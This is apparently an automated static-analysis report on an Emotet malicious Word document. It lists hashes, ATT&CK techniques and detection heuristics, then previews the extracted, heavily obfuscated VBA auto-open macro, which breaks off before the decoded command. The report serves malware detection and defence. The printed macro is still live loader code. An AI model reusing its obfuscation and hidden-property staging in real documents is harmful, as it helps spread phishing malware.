Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 50bc65fe8e20d187…

MALICIOUS

Office (OLE)

Size: 196.4 KB
Created: 2019-12-18 08:49:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: ff485b7870aae113620c8b1db7215efc
SHA-1: d7a0d9a4ee287ff4b2f0b12063c4eb07c95e3c7d
SHA-256: 50bc65fe8e20d187ea4683ce0e00f711938eb6b4e85878ecc6439e8b014772f5
Risk Score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically a Document_Open macro that executes code automatically when the document is opened. Heuristics indicate a command stager that uses CreateObject together with hidden UserForm properties, a technique commonly seen in Emotet maldocs. ClamAV detects the file as Doc.Downloader.Emotet-7464331-0, strongly suggesting its role is to download further malicious payloads.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-7464331-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464331-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main
    Channel: in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10557 bytes
SHA-256: 0b489ba56aa48d0edc2d7239999080a52b4fe152ee53e55084b52adfc1c39c15
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Vzacetxliu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Fcmoftnsm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Znhldvghbbxua
         Case Rtpvvvcy
   Tctgqelwjs = Sin(Aakpmlus)
   Xyxsfpybxor = CStr(Snbkxmxrvc)
   Okfirdypffui = 324
   Vyhumkyqsclax = Sin(Vbwhzrftsgktm)
   Sslyrzjapfu = CStr(Cxqgstjdybzh)
   Pnbrlleks = 567
   Nwmbgbetmruqe = Sin(Ujurmqbvunoo)
   Nsebhfwxcr = CStr(Odnuxxqsrvpb)
   Mbrosmvgy = 5645
End Select
For Oxvxwhcrscy = Pqxqvsccyysvg To Myheoeiavvunn
      While Fotsybpflg <> Pycbqsdftut
         Gqcvbeptosec = Wxtvyrqsbtt * Atn(Jeqkuzwrlmjk) * (Ubfxzcdgh + Vcenpicxkfpxh)
      Wend
Next
   Select Case Drxpyylwb
         Case Mlfrnoskqiue
   Gwuhxkzpm = Sin(Fjgjgrwfdca)
   Mkhvtyimj = CStr(Cqpestxyscif)
   Jryykggu = 324
   Ncevnecvbohp = Sin(Njebjfeevukh)
   Yblieuqqobl = CStr(Mdwttofkabelh)
   Gklgunwady = 567
   Bxvcqufra = Sin(Qsedyzhw)
   Ijeqeump = CStr(Uigenfynqbzh)
   Voqjyavcof = 5645
End Select
For Qmmatbxefil = Sbtgudacvvq To Rcystblz
      While Bqiykcdncq <> Zbvubslvr
         Qjugmojnqcprq = Qarinmild * Atn(Zasotuftropvq) * (Dcdjkfiwclej + Hyrkqpjuci)
      Wend
Next
   Select Case Jjhxbobjee
         Case Djwddzoe
   Zxepjrvg = Sin(Hzfecdad)
   Gwcmdelzvphg = CStr(Jktlejoxo)
   Desazykggwcu = 324
   Egvlzvblzu = Sin(Pyodjidszz)
   Vrwzgjhqbzacs = CStr(Essfyipilsd)
   Rzmenwpiybeq = 567
   Ipylkxty = Sin(Uvqgikhdw)
   Cmvpwxggrnplg = CStr(Ngsqaszfksgi)
   Tbtydfddwoz = 5645
End Select
For Jufjjypxalgm = Glxpohsx To Mdbpjkeqozpl
      While Xkjptpnlwc <> Zyleamikwfwz
         Gpygnvgordx = Whbgzsrk * Atn(Jzdctmrnk) * (Jynppbll + Hyhmdvyxg)
      Wend
Next
Hfekjimal
End Sub

Attribute VB_Name = "Mwtqbkvasc"
Attribute VB_Base = "0{BF7CDED4-24D1-4D3C-88BC-FE9F49D87F39}{49AF0327-84FA-4937-9D9F-628CD34DFD79}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Okptjwhtrco"
Function Rnrfvwlgkp()
   Select Case Gidprvjmbomr
         Case Mbsgbyaqjacuy
   Kfkokhdcykbbu = Sin(Jlzwbildgsrq)
   Mxxqoqjc = CStr(Sjyuwawfqorq)
   Qpycewsr = 324
   Lndkgimhidesk = Sin(Fvmzklvbv)
   Sgygcbeyijwlz = CStr(Khrxyehv)
   Grunqlhk = 567
   Ficbdnlixjj = Sin(Ibnkxbuklzfw)
   Ksxpbsrwbf = CStr(Ksyxprtzmmca)
   Mgtjwetdbq = 5645
End Select
For Iualahudqblo = Dkxypxfrgkc To Lbgrixviyy
      While Ufgskufyhb <> Dacoropji
         Cjkdqogelw = Ryyvqwtbjrao * Atn(Grkirdwwejar) * (Bxxjqflqss + Owakjwvwio)
      Wend
Next
Kputbqlgts = Vzacetxliu.Fcmoftnsm
   Select Case Wcaekgsvnf
         Case Whgqfgxvyug
   Mvrwhlzjzsfzi = Sin(Zyiphlmwanc)
   Jlbvnfyka = CStr(Tagxpaqxa)
   Zmrfnazqientz = 324
   Kmchezybvhe = Sin(Zxfyxnlpd)
   Yljqbghhjzqe = CStr(Dwbkwyjlsrlz)
   Ldagekjtpizo = 567
   Fhjtkgurjfhki = Sin(Secslwgykaji)
   Skhymflis = CStr(Bttvytbwb)
   Xwoaziyt = 5645
End Select
For Kkruzlwhgklnj = Mdlghmij To Kklgcjznlq
      While Byifouns <> Dxmfnmtkcad
         Bkbebmzyusl = Xcynwwcxgo * Atn(Vmuanjytjgump) * (Koifbdbpr + Dgfruwihgzf)
      Wend
Next
Poobtwyapf = Kputbqlgts + Mwtqbkvasc.Hscfpvmyrfzt + Mwtqbkvasc.Dyufgqoks + Mwtqbkvasc.Rwozwyvkv
   Select Case Naakpkout
         Case Ittsapta
   Nhbpaalp = Sin(Isaputzp)
   Vmfjkdtlyfgt = CStr(Atyvpkceb)
   Pseygpdbvfab = 324
   Xhaqmwpsu = Sin(Veaosqkd)
   Kpmspcrdbzrg = CStr(Cbopedxypxll)
   Doqydkmrnyw = 567
   Ospjonilqcvyl = Sin(Apgdydamjt)
   Floptkfif = CStr(Wyvbnmuzsnz)
   Rsvvogfqmicac = 5645
End Select
For Ogohackf = Naoukrft To Aojuyuxkpsbkz
      While Lzsrvhmrta <> Vbqwhmobzwt
         Eaqkacavj = Mcuqowqtsdbi * Atn(Uykrlpgklrhwh) * (Fvmcyjeryncfz + Crqogdqe)
      Wend
Next
Rjdnzieqchyp = Poobtwy
... (truncated)